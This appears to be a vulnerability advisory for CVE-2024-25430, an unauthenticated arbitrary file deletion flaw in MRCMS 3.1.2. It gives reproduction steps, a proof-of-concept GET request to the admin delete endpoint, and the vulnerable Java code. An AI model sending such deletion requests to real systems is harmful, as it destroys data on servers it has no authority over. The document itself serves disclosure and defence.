MRCMS 3.1.2 exists an arbitrary file deletion vulnerability

[xia0chensec]

[The name of an affected Product]

MRCMS

[The affected or fixed version]

v3.1.2

[CVE ID]
CVE-2024-25430

[Vulnerability Type]

Arbitrary file deletion vulnerability

[Vulnerability Description]

MRCMS 3.1.2 exists an arbitrary file deletion vulnerability

[Vulnerability details]

The vulnerability exists: http://localhost:8080/admin/file/delete.do?path=/&name=

1.Select content->File management

2.Click the delete button

Try deleting the test.txt file

POC

GET /admin/file/delete.do?path=/&name=test.txt HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 0

code discovery

Code path: MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java

@ResponseBody
	@RequestMapping("/delete")
	public Object delete(@RequestParam("path") String path, @RequestParam("name") String name){

        if(fileManager.checkPath(path)){
            return new ResultMessage(false, "路径检查异常，删除失败!");
        }

		File file = new File(WebRealPathHolder.REAL_PATH + encoding(path + File.separator + name));
        return fileManager.delete(file);

	}

Pass in the path and name variables in the code, specify the path through path, and specify the file/directory name through name

Code PathMRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java

Users can delete arbitrary files without authorization because authentication is not used before file deletion.

public boolean deleteFolder(File delFolder) { 
		// 判断目录或文件是否存在
		if (!delFolder.exists()) { // 不存在返回 false
			return false;
		} else {
			// 判断是否为文件
			if (delFolder.isFile()) { // 为文件时调用删除文件方法
				return deleteFile(delFolder);
			} else { // 为目录时调用删除目录方法
				return deleteDirectory(delFolder);
			}
		}
	}